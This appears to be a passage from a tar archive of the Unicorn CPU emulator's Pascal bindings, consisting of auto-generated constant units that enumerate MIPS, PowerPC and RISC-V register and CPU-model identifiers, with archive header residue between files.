UC_MIPS_REG_CC6 = 55; UC_MIPS_REG_CC7 = 56; // FPU registers UC_MIPS_REG_F0 = 57; UC_MIPS_REG_F1 = 58; UC_MIPS_REG_F2 = 59; UC_MIPS_REG_F3 = 60; UC_MIPS_REG_F4 = 61; UC_MIPS_REG_F5 = 62; UC_MIPS_REG_F6 = 63; UC_MIPS_REG_F7 = 64; UC_MIPS_REG_F8 = 65; UC_MIPS_REG_F9 = 66; UC_MIPS_REG_F10 = 67; UC_MIPS_REG_F11 = 68; UC_MIPS_REG_F12 = 69; UC_MIPS_REG_F13 = 70; UC_MIPS_REG_F14 = 71; UC_MIPS_REG_F15 = 72; UC_MIPS_REG_F16 = 73; UC_MIPS_REG_F17 = 74; UC_MIPS_REG_F18 = 75; UC_MIPS_REG_F19 = 76; UC_MIPS_REG_F20 = 77; UC_MIPS_REG_F21 = 78; UC_MIPS_REG_F22 = 79; UC_MIPS_REG_F23 = 80; UC_MIPS_REG_F24 = 81; UC_MIPS_REG_F25 = 82; UC_MIPS_REG_F26 = 83; UC_MIPS_REG_F27 = 84; UC_MIPS_REG_F28 = 85; UC_MIPS_REG_F29 = 86; UC_MIPS_REG_F30 = 87; UC_MIPS_REG_F31 = 88; UC_MIPS_REG_FCC0 = 89; UC_MIPS_REG_FCC1 = 90; UC_MIPS_REG_FCC2 = 91; UC_MIPS_REG_FCC3 = 92; UC_MIPS_REG_FCC4 = 93; UC_MIPS_REG_FCC5 = 94; UC_MIPS_REG_FCC6 = 95; UC_MIPS_REG_FCC7 = 96; // AFPR128 UC_MIPS_REG_W0 = 97; UC_MIPS_REG_W1 = 98; UC_MIPS_REG_W2 = 99; UC_MIPS_REG_W3 = 100; UC_MIPS_REG_W4 = 101; UC_MIPS_REG_W5 = 102; UC_MIPS_REG_W6 = 103; UC_MIPS_REG_W7 = 104; UC_MIPS_REG_W8 = 105; UC_MIPS_REG_W9 = 106; UC_MIPS_REG_W10 = 107; UC_MIPS_REG_W11 = 108; UC_MIPS_REG_W12 = 109; UC_MIPS_REG_W13 = 110; UC_MIPS_REG_W14 = 111; UC_MIPS_REG_W15 = 112; UC_MIPS_REG_W16 = 113; UC_MIPS_REG_W17 = 114; UC_MIPS_REG_W18 = 115; UC_MIPS_REG_W19 = 116; UC_MIPS_REG_W20 = 117; UC_MIPS_REG_W21 = 118; UC_MIPS_REG_W22 = 119; UC_MIPS_REG_W23 = 120; UC_MIPS_REG_W24 = 121; UC_MIPS_REG_W25 = 122; UC_MIPS_REG_W26 = 123; UC_MIPS_REG_W27 = 124; UC_MIPS_REG_W28 = 125; UC_MIPS_REG_W29 = 126; UC_MIPS_REG_W30 = 127; UC_MIPS_REG_W31 = 128; UC_MIPS_REG_HI = 129; UC_MIPS_REG_LO = 130; UC_MIPS_REG_P0 = 131; UC_MIPS_REG_P1 = 132; UC_MIPS_REG_P2 = 133; UC_MIPS_REG_MPL0 = 134; UC_MIPS_REG_MPL1 = 135; UC_MIPS_REG_MPL2 = 136; UC_MIPS_REG_CP0_CONFIG3 = 137; UC_MIPS_REG_CP0_USERLOCAL = 138; UC_MIPS_REG_CP0_STATUS = 139; UC_MIPS_REG_ENDING = 140; UC_MIPS_REG_ZERO = 2; UC_MIPS_REG_AT = 3; UC_MIPS_REG_V0 = 4; UC_MIPS_REG_V1 = 5; UC_MIPS_REG_A0 = 6; UC_MIPS_REG_A1 = 7; UC_MIPS_REG_A2 = 8; UC_MIPS_REG_A3 = 9; UC_MIPS_REG_T0 = 10; UC_MIPS_REG_T1 = 11; UC_MIPS_REG_T2 = 12; UC_MIPS_REG_T3 = 13; UC_MIPS_REG_T4 = 14; UC_MIPS_REG_T5 = 15; UC_MIPS_REG_T6 = 16; UC_MIPS_REG_T7 = 17; UC_MIPS_REG_S0 = 18; UC_MIPS_REG_S1 = 19; UC_MIPS_REG_S2 = 20; UC_MIPS_REG_S3 = 21; UC_MIPS_REG_S4 = 22; UC_MIPS_REG_S5 = 23; UC_MIPS_REG_S6 = 24; UC_MIPS_REG_S7 = 25; UC_MIPS_REG_T8 = 26; UC_MIPS_REG_T9 = 27; UC_MIPS_REG_K0 = 28; UC_MIPS_REG_K1 = 29; UC_MIPS_REG_GP = 30; UC_MIPS_REG_SP = 31; UC_MIPS_REG_FP = 32; UC_MIPS_REG_S8 = 32; UC_MIPS_REG_RA = 33; UC_MIPS_REG_HI0 = 45; UC_MIPS_REG_HI1 = 46; UC_MIPS_REG_HI2 = 47; UC_MIPS_REG_HI3 = 48; UC_MIPS_REG_LO0 = 45; UC_MIPS_REG_LO1 = 46; UC_MIPS_REG_LO2 = 47; UC_MIPS_REG_LO3 = 48; implementation end.�������������������������������������������������������������������unicorn-2.1.1/bindings/pascal/unicorn/PpcConst.pas��������������������������������������������������0000664�0000000�0000000�00000026657�14675241067�0022177�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������// For Unicorn Engine. AUTO-GENERATED FILE, DO NOT EDIT unit PpcConst; interface const // PPC CPU UC_CPU_PPC32_401 = 0; UC_CPU_PPC32_401A1 = 1; UC_CPU_PPC32_401B2 = 2; UC_CPU_PPC32_401C2 = 3; UC_CPU_PPC32_401D2 = 4; UC_CPU_PPC32_401E2 = 5; UC_CPU_PPC32_401F2 = 6; UC_CPU_PPC32_401G2 = 7; UC_CPU_PPC32_IOP480 = 8; UC_CPU_PPC32_COBRA = 9; UC_CPU_PPC32_403GA = 10; UC_CPU_PPC32_403GB = 11; UC_CPU_PPC32_403GC = 12; UC_CPU_PPC32_403GCX = 13; UC_CPU_PPC32_405D2 = 14; UC_CPU_PPC32_405D4 = 15; UC_CPU_PPC32_405CRA = 16; UC_CPU_PPC32_405CRB = 17; UC_CPU_PPC32_405CRC = 18; UC_CPU_PPC32_405EP = 19; UC_CPU_PPC32_405EZ = 20; UC_CPU_PPC32_405GPA = 21; UC_CPU_PPC32_405GPB = 22; UC_CPU_PPC32_405GPC = 23; UC_CPU_PPC32_405GPD = 24; UC_CPU_PPC32_405GPR = 25; UC_CPU_PPC32_405LP = 26; UC_CPU_PPC32_NPE405H = 27; UC_CPU_PPC32_NPE405H2 = 28; UC_CPU_PPC32_NPE405L = 29; UC_CPU_PPC32_NPE4GS3 = 30; UC_CPU_PPC32_STB03 = 31; UC_CPU_PPC32_STB04 = 32; UC_CPU_PPC32_STB25 = 33; UC_CPU_PPC32_X2VP4 = 34; UC_CPU_PPC32_X2VP20 = 35; UC_CPU_PPC32_440_XILINX = 36; UC_CPU_PPC32_440_XILINX_W_DFPU = 37; UC_CPU_PPC32_440EPA = 38; UC_CPU_PPC32_440EPB = 39; UC_CPU_PPC32_440EPX = 40; UC_CPU_PPC32_460EXB = 41; UC_CPU_PPC32_G2 = 42; UC_CPU_PPC32_G2H4 = 43; UC_CPU_PPC32_G2GP = 44; UC_CPU_PPC32_G2LS = 45; UC_CPU_PPC32_G2HIP3 = 46; UC_CPU_PPC32_G2HIP4 = 47; UC_CPU_PPC32_MPC603 = 48; UC_CPU_PPC32_G2LE = 49; UC_CPU_PPC32_G2LEGP = 50; UC_CPU_PPC32_G2LELS = 51; UC_CPU_PPC32_G2LEGP1 = 52; UC_CPU_PPC32_G2LEGP3 = 53; UC_CPU_PPC32_MPC5200_V10 = 54; UC_CPU_PPC32_MPC5200_V11 = 55; UC_CPU_PPC32_MPC5200_V12 = 56; UC_CPU_PPC32_MPC5200B_V20 = 57; UC_CPU_PPC32_MPC5200B_V21 = 58; UC_CPU_PPC32_E200Z5 = 59; UC_CPU_PPC32_E200Z6 = 60; UC_CPU_PPC32_E300C1 = 61; UC_CPU_PPC32_E300C2 = 62; UC_CPU_PPC32_E300C3 = 63; UC_CPU_PPC32_E300C4 = 64; UC_CPU_PPC32_MPC8343 = 65; UC_CPU_PPC32_MPC8343A = 66; UC_CPU_PPC32_MPC8343E = 67; UC_CPU_PPC32_MPC8343EA = 68; UC_CPU_PPC32_MPC8347T = 69; UC_CPU_PPC32_MPC8347P = 70; UC_CPU_PPC32_MPC8347AT = 71; UC_CPU_PPC32_MPC8347AP = 72; UC_CPU_PPC32_MPC8347ET = 73; UC_CPU_PPC32_MPC8347EP = 74; UC_CPU_PPC32_MPC8347EAT = 75; UC_CPU_PPC32_MPC8347EAP = 76; UC_CPU_PPC32_MPC8349 = 77; UC_CPU_PPC32_MPC8349A = 78; UC_CPU_PPC32_MPC8349E = 79; UC_CPU_PPC32_MPC8349EA = 80; UC_CPU_PPC32_MPC8377 = 81; UC_CPU_PPC32_MPC8377E = 82; UC_CPU_PPC32_MPC8378 = 83; UC_CPU_PPC32_MPC8378E = 84; UC_CPU_PPC32_MPC8379 = 85; UC_CPU_PPC32_MPC8379E = 86; UC_CPU_PPC32_E500_V10 = 87; UC_CPU_PPC32_E500_V20 = 88; UC_CPU_PPC32_E500V2_V10 = 89; UC_CPU_PPC32_E500V2_V20 = 90; UC_CPU_PPC32_E500V2_V21 = 91; UC_CPU_PPC32_E500V2_V22 = 92; UC_CPU_PPC32_E500V2_V30 = 93; UC_CPU_PPC32_E500MC = 94; UC_CPU_PPC32_MPC8533_V10 = 95; UC_CPU_PPC32_MPC8533_V11 = 96; UC_CPU_PPC32_MPC8533E_V10 = 97; UC_CPU_PPC32_MPC8533E_V11 = 98; UC_CPU_PPC32_MPC8540_V10 = 99; UC_CPU_PPC32_MPC8540_V20 = 100; UC_CPU_PPC32_MPC8540_V21 = 101; UC_CPU_PPC32_MPC8541_V10 = 102; UC_CPU_PPC32_MPC8541_V11 = 103; UC_CPU_PPC32_MPC8541E_V10 = 104; UC_CPU_PPC32_MPC8541E_V11 = 105; UC_CPU_PPC32_MPC8543_V10 = 106; UC_CPU_PPC32_MPC8543_V11 = 107; UC_CPU_PPC32_MPC8543_V20 = 108; UC_CPU_PPC32_MPC8543_V21 = 109; UC_CPU_PPC32_MPC8543E_V10 = 110; UC_CPU_PPC32_MPC8543E_V11 = 111; UC_CPU_PPC32_MPC8543E_V20 = 112; UC_CPU_PPC32_MPC8543E_V21 = 113; UC_CPU_PPC32_MPC8544_V10 = 114; UC_CPU_PPC32_MPC8544_V11 = 115; UC_CPU_PPC32_MPC8544E_V10 = 116; UC_CPU_PPC32_MPC8544E_V11 = 117; UC_CPU_PPC32_MPC8545_V20 = 118; UC_CPU_PPC32_MPC8545_V21 = 119; UC_CPU_PPC32_MPC8545E_V20 = 120; UC_CPU_PPC32_MPC8545E_V21 = 121; UC_CPU_PPC32_MPC8547E_V20 = 122; UC_CPU_PPC32_MPC8547E_V21 = 123; UC_CPU_PPC32_MPC8548_V10 = 124; UC_CPU_PPC32_MPC8548_V11 = 125; UC_CPU_PPC32_MPC8548_V20 = 126; UC_CPU_PPC32_MPC8548_V21 = 127; UC_CPU_PPC32_MPC8548E_V10 = 128; UC_CPU_PPC32_MPC8548E_V11 = 129; UC_CPU_PPC32_MPC8548E_V20 = 130; UC_CPU_PPC32_MPC8548E_V21 = 131; UC_CPU_PPC32_MPC8555_V10 = 132; UC_CPU_PPC32_MPC8555_V11 = 133; UC_CPU_PPC32_MPC8555E_V10 = 134; UC_CPU_PPC32_MPC8555E_V11 = 135; UC_CPU_PPC32_MPC8560_V10 = 136; UC_CPU_PPC32_MPC8560_V20 = 137; UC_CPU_PPC32_MPC8560_V21 = 138; UC_CPU_PPC32_MPC8567 = 139; UC_CPU_PPC32_MPC8567E = 140; UC_CPU_PPC32_MPC8568 = 141; UC_CPU_PPC32_MPC8568E = 142; UC_CPU_PPC32_MPC8572 = 143; UC_CPU_PPC32_MPC8572E = 144; UC_CPU_PPC32_E600 = 145; UC_CPU_PPC32_MPC8610 = 146; UC_CPU_PPC32_MPC8641 = 147; UC_CPU_PPC32_MPC8641D = 148; UC_CPU_PPC32_601_V0 = 149; UC_CPU_PPC32_601_V1 = 150; UC_CPU_PPC32_601_V2 = 151; UC_CPU_PPC32_602 = 152; UC_CPU_PPC32_603 = 153; UC_CPU_PPC32_603E_V1_1 = 154; UC_CPU_PPC32_603E_V1_2 = 155; UC_CPU_PPC32_603E_V1_3 = 156; UC_CPU_PPC32_603E_V1_4 = 157; UC_CPU_PPC32_603E_V2_2 = 158; UC_CPU_PPC32_603E_V3 = 159; UC_CPU_PPC32_603E_V4 = 160; UC_CPU_PPC32_603E_V4_1 = 161; UC_CPU_PPC32_603E7 = 162; UC_CPU_PPC32_603E7T = 163; UC_CPU_PPC32_603E7V = 164; UC_CPU_PPC32_603E7V1 = 165; UC_CPU_PPC32_603E7V2 = 166; UC_CPU_PPC32_603P = 167; UC_CPU_PPC32_604 = 168; UC_CPU_PPC32_604E_V1_0 = 169; UC_CPU_PPC32_604E_V2_2 = 170; UC_CPU_PPC32_604E_V2_4 = 171; UC_CPU_PPC32_604R = 172; UC_CPU_PPC32_740_V1_0 = 173; UC_CPU_PPC32_750_V1_0 = 174; UC_CPU_PPC32_740_V2_0 = 175; UC_CPU_PPC32_750_V2_0 = 176; UC_CPU_PPC32_740_V2_1 = 177; UC_CPU_PPC32_750_V2_1 = 178; UC_CPU_PPC32_740_V2_2 = 179; UC_CPU_PPC32_750_V2_2 = 180; UC_CPU_PPC32_740_V3_0 = 181; UC_CPU_PPC32_750_V3_0 = 182; UC_CPU_PPC32_740_V3_1 = 183; UC_CPU_PPC32_750_V3_1 = 184; UC_CPU_PPC32_740E = 185; UC_CPU_PPC32_750E = 186; UC_CPU_PPC32_740P = 187; UC_CPU_PPC32_750P = 188; UC_CPU_PPC32_750CL_V1_0 = 189; UC_CPU_PPC32_750CL_V2_0 = 190; UC_CPU_PPC32_750CX_V1_0 = 191; UC_CPU_PPC32_750CX_V2_0 = 192; UC_CPU_PPC32_750CX_V2_1 = 193; UC_CPU_PPC32_750CX_V2_2 = 194; UC_CPU_PPC32_750CXE_V2_1 = 195; UC_CPU_PPC32_750CXE_V2_2 = 196; UC_CPU_PPC32_750CXE_V2_3 = 197; UC_CPU_PPC32_750CXE_V2_4 = 198; UC_CPU_PPC32_750CXE_V2_4B = 199; UC_CPU_PPC32_750CXE_V3_0 = 200; UC_CPU_PPC32_750CXE_V3_1 = 201; UC_CPU_PPC32_750CXE_V3_1B = 202; UC_CPU_PPC32_750CXR = 203; UC_CPU_PPC32_750FL = 204; UC_CPU_PPC32_750FX_V1_0 = 205; UC_CPU_PPC32_750FX_V2_0 = 206; UC_CPU_PPC32_750FX_V2_1 = 207; UC_CPU_PPC32_750FX_V2_2 = 208; UC_CPU_PPC32_750FX_V2_3 = 209; UC_CPU_PPC32_750GL = 210; UC_CPU_PPC32_750GX_V1_0 = 211; UC_CPU_PPC32_750GX_V1_1 = 212; UC_CPU_PPC32_750GX_V1_2 = 213; UC_CPU_PPC32_750L_V2_0 = 214; UC_CPU_PPC32_750L_V2_1 = 215; UC_CPU_PPC32_750L_V2_2 = 216; UC_CPU_PPC32_750L_V3_0 = 217; UC_CPU_PPC32_750L_V3_2 = 218; UC_CPU_PPC32_745_V1_0 = 219; UC_CPU_PPC32_755_V1_0 = 220; UC_CPU_PPC32_745_V1_1 = 221; UC_CPU_PPC32_755_V1_1 = 222; UC_CPU_PPC32_745_V2_0 = 223; UC_CPU_PPC32_755_V2_0 = 224; UC_CPU_PPC32_745_V2_1 = 225; UC_CPU_PPC32_755_V2_1 = 226; UC_CPU_PPC32_745_V2_2 = 227; UC_CPU_PPC32_755_V2_2 = 228; UC_CPU_PPC32_745_V2_3 = 229; UC_CPU_PPC32_755_V2_3 = 230; UC_CPU_PPC32_745_V2_4 = 231; UC_CPU_PPC32_755_V2_4 = 232; UC_CPU_PPC32_745_V2_5 = 233; UC_CPU_PPC32_755_V2_5 = 234; UC_CPU_PPC32_745_V2_6 = 235; UC_CPU_PPC32_755_V2_6 = 236; UC_CPU_PPC32_745_V2_7 = 237; UC_CPU_PPC32_755_V2_7 = 238; UC_CPU_PPC32_745_V2_8 = 239; UC_CPU_PPC32_755_V2_8 = 240; UC_CPU_PPC32_7400_V1_0 = 241; UC_CPU_PPC32_7400_V1_1 = 242; UC_CPU_PPC32_7400_V2_0 = 243; UC_CPU_PPC32_7400_V2_1 = 244; UC_CPU_PPC32_7400_V2_2 = 245; UC_CPU_PPC32_7400_V2_6 = 246; UC_CPU_PPC32_7400_V2_7 = 247; UC_CPU_PPC32_7400_V2_8 = 248; UC_CPU_PPC32_7400_V2_9 = 249; UC_CPU_PPC32_7410_V1_0 = 250; UC_CPU_PPC32_7410_V1_1 = 251; UC_CPU_PPC32_7410_V1_2 = 252; UC_CPU_PPC32_7410_V1_3 = 253; UC_CPU_PPC32_7410_V1_4 = 254; UC_CPU_PPC32_7448_V1_0 = 255; UC_CPU_PPC32_7448_V1_1 = 256; UC_CPU_PPC32_7448_V2_0 = 257; UC_CPU_PPC32_7448_V2_1 = 258; UC_CPU_PPC32_7450_V1_0 = 259; UC_CPU_PPC32_7450_V1_1 = 260; UC_CPU_PPC32_7450_V1_2 = 261; UC_CPU_PPC32_7450_V2_0 = 262; UC_CPU_PPC32_7450_V2_1 = 263; UC_CPU_PPC32_7441_V2_1 = 264; UC_CPU_PPC32_7441_V2_3 = 265; UC_CPU_PPC32_7451_V2_3 = 266; UC_CPU_PPC32_7441_V2_10 = 267; UC_CPU_PPC32_7451_V2_10 = 268; UC_CPU_PPC32_7445_V1_0 = 269; UC_CPU_PPC32_7455_V1_0 = 270; UC_CPU_PPC32_7445_V2_1 = 271; UC_CPU_PPC32_7455_V2_1 = 272; UC_CPU_PPC32_7445_V3_2 = 273; UC_CPU_PPC32_7455_V3_2 = 274; UC_CPU_PPC32_7445_V3_3 = 275; UC_CPU_PPC32_7455_V3_3 = 276; UC_CPU_PPC32_7445_V3_4 = 277; UC_CPU_PPC32_7455_V3_4 = 278; UC_CPU_PPC32_7447_V1_0 = 279; UC_CPU_PPC32_7457_V1_0 = 280; UC_CPU_PPC32_7447_V1_1 = 281; UC_CPU_PPC32_7457_V1_1 = 282; UC_CPU_PPC32_7457_V1_2 = 283; UC_CPU_PPC32_7447A_V1_0 = 284; UC_CPU_PPC32_7457A_V1_0 = 285; UC_CPU_PPC32_7447A_V1_1 = 286; UC_CPU_PPC32_7457A_V1_1 = 287; UC_CPU_PPC32_7447A_V1_2 = 288; UC_CPU_PPC32_7457A_V1_2 = 289; UC_CPU_PPC32_ENDING = 290; // PPC64 CPU UC_CPU_PPC64_E5500 = 0; UC_CPU_PPC64_E6500 = 1; UC_CPU_PPC64_970_V2_2 = 2; UC_CPU_PPC64_970FX_V1_0 = 3; UC_CPU_PPC64_970FX_V2_0 = 4; UC_CPU_PPC64_970FX_V2_1 = 5; UC_CPU_PPC64_970FX_V3_0 = 6; UC_CPU_PPC64_970FX_V3_1 = 7; UC_CPU_PPC64_970MP_V1_0 = 8; UC_CPU_PPC64_970MP_V1_1 = 9; UC_CPU_PPC64_POWER5_V2_1 = 10; UC_CPU_PPC64_POWER7_V2_3 = 11; UC_CPU_PPC64_POWER7_V2_1 = 12; UC_CPU_PPC64_POWER8E_V2_1 = 13; UC_CPU_PPC64_POWER8_V2_0 = 14; UC_CPU_PPC64_POWER8NVL_V1_0 = 15; UC_CPU_PPC64_POWER9_V1_0 = 16; UC_CPU_PPC64_POWER9_V2_0 = 17; UC_CPU_PPC64_POWER10_V1_0 = 18; UC_CPU_PPC64_ENDING = 19; // PPC registers UC_PPC_REG_INVALID = 0; // General purpose registers UC_PPC_REG_PC = 1; UC_PPC_REG_0 = 2; UC_PPC_REG_1 = 3; UC_PPC_REG_2 = 4; UC_PPC_REG_3 = 5; UC_PPC_REG_4 = 6; UC_PPC_REG_5 = 7; UC_PPC_REG_6 = 8; UC_PPC_REG_7 = 9; UC_PPC_REG_8 = 10; UC_PPC_REG_9 = 11; UC_PPC_REG_10 = 12; UC_PPC_REG_11 = 13; UC_PPC_REG_12 = 14; UC_PPC_REG_13 = 15; UC_PPC_REG_14 = 16; UC_PPC_REG_15 = 17; UC_PPC_REG_16 = 18; UC_PPC_REG_17 = 19; UC_PPC_REG_18 = 20; UC_PPC_REG_19 = 21; UC_PPC_REG_20 = 22; UC_PPC_REG_21 = 23; UC_PPC_REG_22 = 24; UC_PPC_REG_23 = 25; UC_PPC_REG_24 = 26; UC_PPC_REG_25 = 27; UC_PPC_REG_26 = 28; UC_PPC_REG_27 = 29; UC_PPC_REG_28 = 30; UC_PPC_REG_29 = 31; UC_PPC_REG_30 = 32; UC_PPC_REG_31 = 33; UC_PPC_REG_CR0 = 34; UC_PPC_REG_CR1 = 35; UC_PPC_REG_CR2 = 36; UC_PPC_REG_CR3 = 37; UC_PPC_REG_CR4 = 38; UC_PPC_REG_CR5 = 39; UC_PPC_REG_CR6 = 40; UC_PPC_REG_CR7 = 41; UC_PPC_REG_FPR0 = 42; UC_PPC_REG_FPR1 = 43; UC_PPC_REG_FPR2 = 44; UC_PPC_REG_FPR3 = 45; UC_PPC_REG_FPR4 = 46; UC_PPC_REG_FPR5 = 47; UC_PPC_REG_FPR6 = 48; UC_PPC_REG_FPR7 = 49; UC_PPC_REG_FPR8 = 50; UC_PPC_REG_FPR9 = 51; UC_PPC_REG_FPR10 = 52; UC_PPC_REG_FPR11 = 53; UC_PPC_REG_FPR12 = 54; UC_PPC_REG_FPR13 = 55; UC_PPC_REG_FPR14 = 56; UC_PPC_REG_FPR15 = 57; UC_PPC_REG_FPR16 = 58; UC_PPC_REG_FPR17 = 59; UC_PPC_REG_FPR18 = 60; UC_PPC_REG_FPR19 = 61; UC_PPC_REG_FPR20 = 62; UC_PPC_REG_FPR21 = 63; UC_PPC_REG_FPR22 = 64; UC_PPC_REG_FPR23 = 65; UC_PPC_REG_FPR24 = 66; UC_PPC_REG_FPR25 = 67; UC_PPC_REG_FPR26 = 68; UC_PPC_REG_FPR27 = 69; UC_PPC_REG_FPR28 = 70; UC_PPC_REG_FPR29 = 71; UC_PPC_REG_FPR30 = 72; UC_PPC_REG_FPR31 = 73; UC_PPC_REG_LR = 74; UC_PPC_REG_XER = 75; UC_PPC_REG_CTR = 76; UC_PPC_REG_MSR = 77; UC_PPC_REG_FPSCR = 78; UC_PPC_REG_CR = 79; UC_PPC_REG_ENDING = 80; implementation end.���������������������������������������������������������������������������������unicorn-2.1.1/bindings/pascal/unicorn/RiscvConst.pas������������������������������������������������0000664�0000000�0000000�00000017177�14675241067�0022540�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������// For Unicorn Engine. AUTO-GENERATED FILE, DO NOT EDIT unit RiscvConst; interface const // RISCV32 CPU UC_CPU_RISCV32_ANY = 0; UC_CPU_RISCV32_BASE32 = 1; UC_CPU_RISCV32_SIFIVE_E31 = 2; UC_CPU_RISCV32_SIFIVE_U34 = 3; UC_CPU_RISCV32_ENDING = 4; // RISCV64 CPU UC_CPU_RISCV64_ANY = 0; UC_CPU_RISCV64_BASE64 = 1; UC_CPU_RISCV64_SIFIVE_E51 = 2; UC_CPU_RISCV64_SIFIVE_U54 = 3; UC_CPU_RISCV64_ENDING = 4; // RISCV registers UC_RISCV_REG_INVALID = 0; // General purpose registers UC_RISCV_REG_X0 = 1; UC_RISCV_REG_X1 = 2; UC_RISCV_REG_X2 = 3; UC_RISCV_REG_X3 = 4; UC_RISCV_REG_X4 = 5; UC_RISCV_REG_X5 = 6; UC_RISCV_REG_X6 = 7; UC_RISCV_REG_X7 = 8; UC_RISCV_REG_X8 = 9; UC_RISCV_REG_X9 = 10; UC_RISCV_REG_X10 = 11; UC_RISCV_REG_X11 = 12; UC_RISCV_REG_X12 = 13; UC_RISCV_REG_X13 = 14; UC_RISCV_REG_X14 = 15; UC_RISCV_REG_X15 = 16; UC_RISCV_REG_X16 = 17; UC_RISCV_REG_X17 = 18; UC_RISCV_REG_X18 = 19; UC_RISCV_REG_X19 = 20; UC_RISCV_REG_X20 = 21; UC_RISCV_REG_X21 = 22; UC_RISCV_REG_X22 = 23; UC_RISCV_REG_X23 = 24; UC_RISCV_REG_X24 = 25; UC_RISCV_REG_X25 = 26; UC_RISCV_REG_X26 = 27; UC_RISCV_REG_X27 = 28; UC_RISCV_REG_X28 = 29; UC_RISCV_REG_X29 = 30; UC_RISCV_REG_X30 = 31; UC_RISCV_REG_X31 = 32; // RISCV CSR UC_RISCV_REG_USTATUS = 33; UC_RISCV_REG_UIE = 34; UC_RISCV_REG_UTVEC = 35; UC_RISCV_REG_USCRATCH = 36; UC_RISCV_REG_UEPC = 37; UC_RISCV_REG_UCAUSE = 38; UC_RISCV_REG_UTVAL = 39; UC_RISCV_REG_UIP = 40; UC_RISCV_REG_FFLAGS = 41; UC_RISCV_REG_FRM = 42; UC_RISCV_REG_FCSR = 43; UC_RISCV_REG_CYCLE = 44; UC_RISCV_REG_TIME = 45; UC_RISCV_REG_INSTRET = 46; UC_RISCV_REG_HPMCOUNTER3 = 47; UC_RISCV_REG_HPMCOUNTER4 = 48; UC_RISCV_REG_HPMCOUNTER5 = 49; UC_RISCV_REG_HPMCOUNTER6 = 50; UC_RISCV_REG_HPMCOUNTER7 = 51; UC_RISCV_REG_HPMCOUNTER8 = 52; UC_RISCV_REG_HPMCOUNTER9 = 53; UC_RISCV_REG_HPMCOUNTER10 = 54; UC_RISCV_REG_HPMCOUNTER11 = 55; UC_RISCV_REG_HPMCOUNTER12 = 56; UC_RISCV_REG_HPMCOUNTER13 = 57; UC_RISCV_REG_HPMCOUNTER14 = 58; UC_RISCV_REG_HPMCOUNTER15 = 59; UC_RISCV_REG_HPMCOUNTER16 = 60; UC_RISCV_REG_HPMCOUNTER17 = 61; UC_RISCV_REG_HPMCOUNTER18 = 62; UC_RISCV_REG_HPMCOUNTER19 = 63; UC_RISCV_REG_HPMCOUNTER20 = 64; UC_RISCV_REG_HPMCOUNTER21 = 65; UC_RISCV_REG_HPMCOUNTER22 = 66; UC_RISCV_REG_HPMCOUNTER23 = 67; UC_RISCV_REG_HPMCOUNTER24 = 68; UC_RISCV_REG_HPMCOUNTER25 = 69; UC_RISCV_REG_HPMCOUNTER26 = 70; UC_RISCV_REG_HPMCOUNTER27 = 71; UC_RISCV_REG_HPMCOUNTER28 = 72; UC_RISCV_REG_HPMCOUNTER29 = 73; UC_RISCV_REG_HPMCOUNTER30 = 74; UC_RISCV_REG_HPMCOUNTER31 = 75; UC_RISCV_REG_CYCLEH = 76; UC_RISCV_REG_TIMEH = 77; UC_RISCV_REG_INSTRETH = 78; UC_RISCV_REG_HPMCOUNTER3H = 79; UC_RISCV_REG_HPMCOUNTER4H = 80; UC_RISCV_REG_HPMCOUNTER5H = 81; UC_RISCV_REG_HPMCOUNTER6H = 82; UC_RISCV_REG_HPMCOUNTER7H = 83; UC_RISCV_REG_HPMCOUNTER8H = 84; UC_RISCV_REG_HPMCOUNTER9H = 85; UC_RISCV_REG_HPMCOUNTER10H = 86; UC_RISCV_REG_HPMCOUNTER11H = 87; UC_RISCV_REG_HPMCOUNTER12H = 88; UC_RISCV_REG_HPMCOUNTER13H = 89; UC_RISCV_REG_HPMCOUNTER14H = 90; UC_RISCV_REG_HPMCOUNTER15H = 91; UC_RISCV_REG_HPMCOUNTER16H = 92; UC_RISCV_REG_HPMCOUNTER17H = 93; UC_RISCV_REG_HPMCOUNTER18H = 94; UC_RISCV_REG_HPMCOUNTER19H = 95; UC_RISCV_REG_HPMCOUNTER20H = 96; UC_RISCV_REG_HPMCOUNTER21H = 97; UC_RISCV_REG_HPMCOUNTER22H = 98; UC_RISCV_REG_HPMCOUNTER23H = 99; UC_RISCV_REG_HPMCOUNTER24H = 100; UC_RISCV_REG_HPMCOUNTER25H = 101; UC_RISCV_REG_HPMCOUNTER26H = 102; UC_RISCV_REG_HPMCOUNTER27H = 103; UC_RISCV_REG_HPMCOUNTER28H = 104; UC_RISCV_REG_HPMCOUNTER29H = 105; UC_RISCV_REG_HPMCOUNTER30H = 106; UC_RISCV_REG_HPMCOUNTER31H = 107; UC_RISCV_REG_MCYCLE = 108; UC_RISCV_REG_MINSTRET = 109; UC_RISCV_REG_MCYCLEH = 110; UC_RISCV_REG_MINSTRETH = 111; UC_RISCV_REG_MVENDORID = 112; UC_RISCV_REG_MARCHID = 113; UC_RISCV_REG_MIMPID = 114; UC_RISCV_REG_MHARTID = 115; UC_RISCV_REG_MSTATUS = 116; UC_RISCV_REG_MISA = 117; UC_RISCV_REG_MEDELEG = 118; UC_RISCV_REG_MIDELEG = 119; UC_RISCV_REG_MIE = 120; UC_RISCV_REG_MTVEC = 121; UC_RISCV_REG_MCOUNTEREN = 122; UC_RISCV_REG_MSTATUSH = 123; UC_RISCV_REG_MUCOUNTEREN = 124; UC_RISCV_REG_MSCOUNTEREN = 125; UC_RISCV_REG_MHCOUNTEREN = 126; UC_RISCV_REG_MSCRATCH = 127; UC_RISCV_REG_MEPC = 128; UC_RISCV_REG_MCAUSE = 129; UC_RISCV_REG_MTVAL = 130; UC_RISCV_REG_MIP = 131; UC_RISCV_REG_MBADADDR = 132; UC_RISCV_REG_SSTATUS = 133; UC_RISCV_REG_SEDELEG = 134; UC_RISCV_REG_SIDELEG = 135; UC_RISCV_REG_SIE = 136; UC_RISCV_REG_STVEC = 137; UC_RISCV_REG_SCOUNTEREN = 138; UC_RISCV_REG_SSCRATCH = 139; UC_RISCV_REG_SEPC = 140; UC_RISCV_REG_SCAUSE = 141; UC_RISCV_REG_STVAL = 142; UC_RISCV_REG_SIP = 143; UC_RISCV_REG_SBADADDR = 144; UC_RISCV_REG_SPTBR = 145; UC_RISCV_REG_SATP = 146; UC_RISCV_REG_HSTATUS = 147; UC_RISCV_REG_HEDELEG = 148; UC_RISCV_REG_HIDELEG = 149; UC_RISCV_REG_HIE = 150; 